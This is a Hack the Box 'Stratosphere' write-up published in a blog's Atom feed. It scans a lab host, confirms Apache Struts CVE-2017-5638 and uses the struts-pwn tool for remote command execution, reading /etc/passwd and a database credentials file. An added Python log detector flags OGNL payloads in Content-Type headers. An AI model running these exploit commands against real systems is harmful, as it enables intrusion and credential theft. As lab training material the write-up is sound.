<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.5.2">Jekyll</generator><link href="https://dastinia.io/atom.xml" rel="self" type="application/atom+xml" /><link href="https://dastinia.io/" rel="alternate" type="text/html" /><updated>2018-09-01T08:35:05-04:00</updated><id>https://dastinia.io/</id><title type="html">dastinia</title><subtitle>A place to share and offer the highest quality offensive &amp; defensive information security guides, boot2root writeups, and much more to the best of my ability. Also a home to hold my ramblings on anything else that I feel is important...</subtitle><author><name>A Medic (@OnlyaMedic)</name></author><entry><title type="html">Hack the Box - Stratosphere Write up</title><link href="https://dastinia.io/write-up/hackthebox/2018/09/01/hackthebox-stratosphere-writeup/" rel="alternate" type="text/html" title="Hack the Box - Stratosphere Write up" /><published>2018-09-01T00:00:00-04:00</published><updated>2018-09-01T00:00:00-04:00</updated><id>https://dastinia.io/write-up/hackthebox/2018/09/01/hackthebox-stratosphere-writeup</id><content type="html" xml:base="https://dastinia.io/write-up/hackthebox/2018/09/01/hackthebox-stratosphere-writeup/">&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://dastinia.io/assets/images/htb/stratosphere/1.png&quot; alt=&quot;stratosphere&quot; /&gt;
&lt;/p&gt;

&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;I don’t have much to say; Stratosphere was a great box. Every step in completing this box was extremely logical, and you could pick up tons of neat little tricks, coupled with a pretty unique priv. esc vector that I’ve never really seen before. Stratosphere overall was an extremely well-built box. Hats off to &lt;em&gt;linted&lt;/em&gt; for such a great creation.&lt;/p&gt;

&lt;h2 id=&quot;tools-used&quot;&gt;Tools Used&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/&quot;&gt;Nmap&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://portswigger.net/&quot;&gt;BurpSuite&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://www.openwall.com/john/&quot;&gt;John the Ripper&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/mazen160/struts-pwn&quot;&gt;struts-pwn&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;enumeration&quot;&gt;Enumeration&lt;/h2&gt;

&lt;p&gt;As with every HTB machine, let’s begin with an nmap scan against &lt;em&gt;Stratosphere&lt;/em&gt; (10.10.10.64).&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere# nmap -sV -sC -Pn 10.10.10.64 -oA strat
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-30 19:35 EDT
Nmap scan report for 10.10.10.64
Host is up (0.18s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
|   2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
|   256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_  256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
80/tcp   open  http
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1114
|     Date: Thu, 30 Aug 2018 23:36:02 GMT
|     Connection: close
|     &amp;lt;!doctype html&amp;gt;&amp;lt;html lang=&quot;en&quot;&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;HTTP Status 404
|     Found&amp;lt;/title&amp;gt;&amp;lt;style type=&quot;text/css&quot;&amp;gt;h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}&amp;lt;/style&amp;gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;
|   GetRequest:
|     HTTP/1.1 200
|     Accept-Ranges: bytes
|     ETag: W/&quot;1708-1519762495000&quot;
|     Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
|     Content-Type: text/html
|     Content-Length: 1708
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|     Connection: close
|     &amp;lt;!DOCTYPE html&amp;gt;
|     &amp;lt;html&amp;gt;
|     &amp;lt;head&amp;gt;
|     &amp;lt;meta charset=&quot;utf-8&quot;/&amp;gt;
|     &amp;lt;title&amp;gt;Stratosphere&amp;lt;/title&amp;gt;
|     &amp;lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;main.css&quot;&amp;gt;
|     &amp;lt;/head&amp;gt;
|     &amp;lt;body&amp;gt;
|     &amp;lt;div id=&quot;background&quot;&amp;gt;&amp;lt;/div&amp;gt;
|     &amp;lt;header id=&quot;main-header&quot; class=&quot;hidden&quot;&amp;gt;
|     &amp;lt;div class=&quot;container&quot;&amp;gt;
|     &amp;lt;div class=&quot;content-wrap&quot;&amp;gt;
|     &amp;lt;p&amp;gt;&amp;lt;i class=&quot;fa fa-diamond&quot;&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/p&amp;gt;
|     &amp;lt;nav&amp;gt;
|     class=&quot;btn&quot; href=&quot;GettingStarted.html&quot;&amp;gt;Get started&amp;lt;/a&amp;gt;
|     &amp;lt;/nav&amp;gt;
|     &amp;lt;/div&amp;gt;
|     &amp;lt;/div&amp;gt;
|     &amp;lt;/header&amp;gt;
|     &amp;lt;section id=&quot;greeting&quot;&amp;gt;
|     &amp;lt;div class=&quot;container&quot;&amp;gt;
|     &amp;lt;div class=&quot;content-wrap&quot;&amp;gt;
|     &amp;lt;h1&amp;gt;Stratosphere&amp;lt;br&amp;gt;We protect your credit.&amp;lt;/h1&amp;gt;
|     class=&quot;btn&quot; href=&quot;GettingStarted.html&quot;&amp;gt;Get started now&amp;lt;/a&amp;gt;
|     &amp;lt;p&amp;gt;&amp;lt;i class=&quot;ar
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
|     Content-Length: 0
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Transfer-Encoding: chunked
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|     Connection: close
|   X11Probe:
|     HTTP/1.1 400
|     Date: Thu, 30 Aug 2018 23:36:02 GMT
|_    Connection: close
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
8080/tcp open  http-proxy
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1114
|     Date: Thu, 30 Aug 2018 23:36:02 GMT
|     Connection: close
|     &amp;lt;!doctype html&amp;gt;&amp;lt;html lang=&quot;en&quot;&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;HTTP Status 404
|     Found&amp;lt;/title&amp;gt;&amp;lt;style type=&quot;text/css&quot;&amp;gt;h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}&amp;lt;/style&amp;gt;&amp;lt;/head&amp;gt;&amp;lt;body&amp;gt;
|   GetRequest:
|     HTTP/1.1 200
|     Accept-Ranges: bytes
|     ETag: W/&quot;1708-1519762495000&quot;
|     Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
|     Content-Type: text/html
|     Content-Length: 1708
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|     Connection: close
|     &lt;span class=&quot;cp&quot;&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;head&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;meta&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;charset=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;utf-8&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;/&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;title&amp;gt;&lt;/span&gt;Stratosphere&lt;span class=&quot;nt&quot;&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;link&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;rel=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;stylesheet&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;type=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;text/css&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;href=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;main.css&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;id=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;background&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;header&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;id=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;main-header&quot;&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;hidden&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;container&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;content-wrap&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;p&amp;gt;&amp;lt;i&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;fa fa-diamond&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&amp;lt;/i&amp;gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;nav&amp;gt;&lt;/span&gt;
|     class=&quot;btn&quot; href=&quot;GettingStarted.html&quot;&amp;gt;Get started&lt;span class=&quot;nt&quot;&gt;&amp;lt;/a&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;/nav&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;/header&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;section&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;id=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;greeting&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;container&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;content-wrap&quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;h1&amp;gt;&lt;/span&gt;Stratosphere&lt;span class=&quot;nt&quot;&gt;&amp;lt;br&amp;gt;&lt;/span&gt;We protect your credit.&lt;span class=&quot;nt&quot;&gt;&amp;lt;/h1&amp;gt;&lt;/span&gt;
|     class=&quot;btn&quot; href=&quot;GettingStarted.html&quot;&amp;gt;Get started now&lt;span class=&quot;nt&quot;&gt;&amp;lt;/a&amp;gt;&lt;/span&gt;
|     &lt;span class=&quot;nt&quot;&gt;&amp;lt;p&amp;gt;&amp;lt;i&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;ar
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
|     Content-Length: 0
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Transfer-Encoding: chunked
|     Date: Thu, 30 Aug 2018 23:36:01 GMT
|_    Connection: close
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at [https://nmap.org/cgi-bin/submit.cgi?new-service :
...[snip]...

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.22 seconds
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;From our enumeration we can observe that the following services are available on the host: &lt;em&gt;SSH&lt;/em&gt; (22), &lt;em&gt;HTTP Web service&lt;/em&gt; (80), and what appears to be another &lt;em&gt;HTTP Web service&lt;/em&gt; (8080).&lt;/p&gt;

&lt;h3 id=&quot;enumerating-webservice---port-80&quot;&gt;Enumerating Webservice - Port 80&lt;/h3&gt;

&lt;p&gt;Visiting the webservice on &lt;em&gt;port 80&lt;/em&gt; in a web browser brings us to the “Stratosphere” Web Application landing page. Most HTB boxes follow some sort of theme, or are a reference to some event. (Keeping in mind that the &lt;a href=&quot;https://www.synopsys.com/blogs/software-security/equifax-apache-struts-cve-2017-5638-vulnerability/&quot;&gt;Equifax breach&lt;/a&gt; was still fresh)&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/stratosphere/2.png&quot; alt=&quot;&amp;quot;Stratosphere Homepage&amp;quot;&quot; title=&quot;Stratosphere Homepage&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Clicking on the “Getting Started” URL leads us to a “Site under construction” page as seen below.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/stratosphere/3.png&quot; alt=&quot;&amp;quot;Site under construction page&amp;quot;&quot; title=&quot;Site under construction page&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Enumerating the site with gobuster reveals the following directories. The &lt;code class=&quot;highlighter-rouge&quot;&gt;/manager&lt;/code&gt; path suggests that this application is running Apache Tomcat. Attempting to authenticate to the Tomcat manager with the usual default credentials fails.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://10.10.10.64/ -x php,html -s 200,204,301,302,307,403 -t 100  | tee gobuster_strato

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.64/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 307,403,200,204,301,302
[+] Extensions   : .php,.html
=====================================================
/index.html (Status: 200)
/manager (Status: 302)
/GettingStarted.html (Status: 200)
/Monitoring (Status: 302)
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Visiting the &lt;code class=&quot;highlighter-rouge&quot;&gt;/Monitoring&lt;/code&gt; web content redirects us to the &lt;em&gt;“Stratosphere Credit Monitoring”&lt;/em&gt; application.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/stratosphere/4.png&quot; alt=&quot;&amp;quot;Stratosphere Credit Monitoring Application&amp;quot;&quot; title=&quot;Stratosphere Credit Monitoring Application&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The application uses the &lt;code class=&quot;highlighter-rouge&quot;&gt;.action&lt;/code&gt; file extension, which is the URL pattern associated with Apache Struts. Some further research confirms that it is indeed the well-known extension used by Java WebSphere &amp;amp; Apache Struts applications.&lt;/p&gt;

&lt;p&gt;At this point, if you follow popular infosec news and events, you would know that the U.S. credit monitoring organization “Equifax” was compromised through an unpatched Apache Struts vulnerability. Based on the similarities and the context clues of the “Stratosphere Credit Monitoring” application, we can reasonably suspect that this application is vulnerable to the “Apache Struts” RCE vulnerability.&lt;/p&gt;

&lt;p&gt;After some quick googling we come across the following PoC exploit for the Apache Struts vulnerability CVE-2017-5638, called &lt;a href=&quot;https://github.com/mazen160/struts-pwn&quot;&gt;struts-pwn&lt;/a&gt;.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere# git clone https://github.com/mazen160/struts-pwn.git
Cloning into 'struts-pwn'...
remote: Counting objects: 37, done.
remote: Total 37 (delta 0), reused 0 (delta 0), pack-reused 37
Unpacking objects: 100% (37/37), done.
root@dastinia:~/htb/stratosphere# cd struts-pwn/
root@dastinia:~/htb/stratosphere/struts-pwn# pip install -r requirements.txt
Requirement already satisfied: argparse in /usr/lib/python2.7 (from -r requirements.txt (line 1))
Requirement already satisfied: requests in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 2))
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;validating that the application is vulnerable with struts-pwn&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -h
usage: struts-pwn.py [-h] [-u URL] [-l USEDLIST] [-c CMD] [--check]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Check a single URL.
  -l USEDLIST, --list USEDLIST
                        Check a list of URLs.
  -c CMD, --cmd CMD     Command to execute. (Default: id)
  --check               Check if a target is vulnerable.
root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action --check

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] Status: Vulnerable!
[%] Done.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;verifying that we have remote code execution&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c &quot;id; uname -a&quot;

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: id; uname -a
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--&amp;gt; ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)
Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64 GNU/Linux

[%] Done.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
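&lt;p&gt;On the defensive side, CVE-2017-5638 is triggered through the request &lt;code class=&quot;highlighter-rouge&quot;&gt;Content-Type&lt;/code&gt; header, so a Tomcat access log that records that header gives a simple place to spot exploitation attempts against &lt;code class=&quot;highlighter-rouge&quot;&gt;.action&lt;/code&gt; endpoints. The following is an added example (not part of the original writeup or of struts-pwn); the AccessLogValve pattern it assumes and the log lines it parses are constructed for it.&lt;/p&gt;

```python
import re

# Assumed Tomcat AccessLogValve pattern for the lines below:
#   %h %l %u %t "%r" %s %b "%{Content-Type}i"
# The trailing %{Content-Type}i field logs the request Content-Type header,
# which is where a CVE-2017-5638 payload arrives: the Jakarta Multipart parser
# echoes an unparseable Content-Type into an error message that Struts then
# evaluates as OGNL. These log lines are constructed for this example; the
# client IP, sizes and the two OGNL markers are not taken from the box.
SAMPLE_LOG = """\
10.10.14.5 - - [30/Aug/2018:23:36:01 -0400] "GET /Monitoring/example/Welcome.action HTTP/1.1" 200 3412 "-"
10.10.14.5 - - [30/Aug/2018:23:36:02 -0400] "POST /Monitoring/example/Login.action HTTP/1.1" 302 0 "multipart/form-data; boundary=----demo"
10.10.14.5 - - [30/Aug/2018:23:38:41 -0400] "GET /Monitoring/example/Welcome.action HTTP/1.1" 200 3412 "%{(#demo='multipart/form-data').(#x=1)}"
10.10.14.5 - - [30/Aug/2018:23:38:42 -0400] "GET /index.html HTTP/1.1" 200 1708 "${#demo}"
10.10.14.5 - - [30/Aug/2018:23:39:00 -0400] "GET /GettingStarted.html HTTP/1.1" 200 512 "-"
"""

# Groups: client ip, timestamp, method, path, status, Content-Type header.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"$'
)

# OGNL expression delimiters. A legitimate media type never contains either,
# so their presence in Content-Type is a strong signal regardless of the rest
# of the payload.
OGNL_RE = re.compile(r'%\{|\$\{')


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not
    match the assumed AccessLogValve pattern."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ip, ts, method, path, status, ctype = m.groups()
    return {
        "ip": ip,
        "time": ts,
        "method": method,
        "path": path,
        "status": int(status),
        "content_type": ctype,
    }


def find_struts_ognl(log_text):
    """Return one alert per request whose Content-Type carries an OGNL
    expression. Hits against Struts action URLs (*.action, the pattern seen on
    this box) are rated 'high'; the same marker against any other path is still
    'medium', since Struts can also be mapped without the extension."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not OGNL_RE.search(rec["content_type"]):
            continue
        severity = "high" if rec["path"].endswith(".action") else "medium"
        alerts.append({
            "ip": rec["ip"],
            "time": rec["time"],
            "path": rec["path"],
            "severity": severity,
            "content_type": rec["content_type"],
        })
    return alerts


if __name__ == "__main__":
    for alert in find_struts_ognl(SAMPLE_LOG):
        print(f'{alert["severity"]:6s} {alert["time"]} {alert["ip"]} '
              f'{alert["path"]} Content-Type={alert["content_type"]!r}')
```

A plain multipart upload (second line) is not flagged; only the two requests whose header contains an expression delimiter are reported.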

&lt;p&gt;Now that we know we have successful remote code execution, let’s try to escalate our privileges further and look into getting an interactive shell.&lt;/p&gt;

&lt;h2 id=&quot;exploitation&quot;&gt;Exploitation&lt;/h2&gt;

&lt;h3 id=&quot;exploiting-apache-struts-rce-with-struts-pwn&quot;&gt;Exploiting Apache Struts RCE with Struts-Pwn&lt;/h3&gt;

&lt;p&gt;&lt;em&gt;reading contents of /etc/passwd&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c &quot;cat /etc/passwd&quot;

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: cat /etc/passwd
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--&amp;gt; ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...[snip]...
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
lightdm:x:111:113:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:112:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:113:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:114:118::/var/lib/saned:/bin/false
richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash
tomcat8:x:115:119::/var/lib/tomcat8:/bin/bash
mysql:x:116:120:MySQL Server,,,:/nonexistent:/bin/false

[%] Done.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;Let’s see what files are available to us in the current working directory of this Struts application…&lt;/p&gt;

&lt;p&gt;&lt;em&gt;listing contents of current working directory&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c &quot;ls -la&quot;

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: ls -la
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--&amp;gt; ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

total 24
drwxr-xr-x  5 root    root    4096 Aug 30 19:46 .
drwxr-xr-x 42 root    root    4096 Oct  3  2017 ..
lrwxrwxrwx  1 root    root      12 Sep  3  2017 conf -&amp;gt; /etc/tomcat8
-rw-r--r--  1 root    root      68 Oct  2  2017 db_connect
drwxr-xr-x  2 tomcat8 tomcat8 4096 Sep  3  2017 lib
lrwxrwxrwx  1 root    root      17 Sep  3  2017 logs -&amp;gt; ../../log/tomcat8
drwxr-xr-x  2 root    root    4096 Aug 30 19:46 policy
drwxrwxr-x  4 tomcat8 tomcat8 4096 Feb 10  2018 webapps
lrwxrwxrwx  1 root    root      19 Sep  3  2017 work -&amp;gt; ../../cache/tomcat8

[%] Done.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;getting the contents of db_connect&lt;/em&gt;&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/stratosphere/struts-pwn# python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c &quot;cat db_connect&quot;

[*] URL: http://10.10.10.64/Monitoring/example/Welcome.action
[*] CMD: cat db_connect
[!] ChunkedEncodingError Error: Making another request to the url.
Refer to: https://github.com/mazen160/struts-pwn/issues/8 for help.
EXCEPTION::::--&amp;gt; ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

[ssn]
user=ssn_admin
pass=AWs64@on*&amp;amp;

[users]
user=admin
pass=admin

[%] Done.
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

